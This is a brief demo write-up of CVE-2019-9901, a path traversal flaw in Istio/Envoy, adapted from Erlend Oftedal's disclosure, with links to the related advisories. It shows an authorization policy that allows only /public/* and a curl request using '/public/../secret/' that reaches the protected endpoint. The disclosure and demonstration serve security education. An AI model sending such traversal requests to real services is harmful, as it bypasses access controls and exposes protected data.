CVE-2019-9901 - Istio/Envoy Path traversal

This scenario demos has been taken from https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md. Thanks to Erlend Oftedal

A simple project with a web server and deployed it on Kubernetes. The web application had two endpoints /public/ and /secret/. Added an authorization policy which tried to grant access to anything below /public/:

  rules:
  - services: ["backend.fishy.svc.cluster.local"]
    methods: ["GET"]
    paths: ["/public/*"]

Then used standard path traversal from curl:

curl -vvvv --path-as-is  "http://backend.fishy.svc.cluster.local:8081/public/../secret/"

And was able to reach /secret/.

Reference

• Security postmortem for CVE-2019-9900, CVE-2019-9901
• Announcing Istio 1.1.2 with Important Security Update
• CVE-2019-9901 - Istio/Envoy Path traversal
• Envoy Proxy — high severity vulnerabilities that can lead to exposure of unauthorized services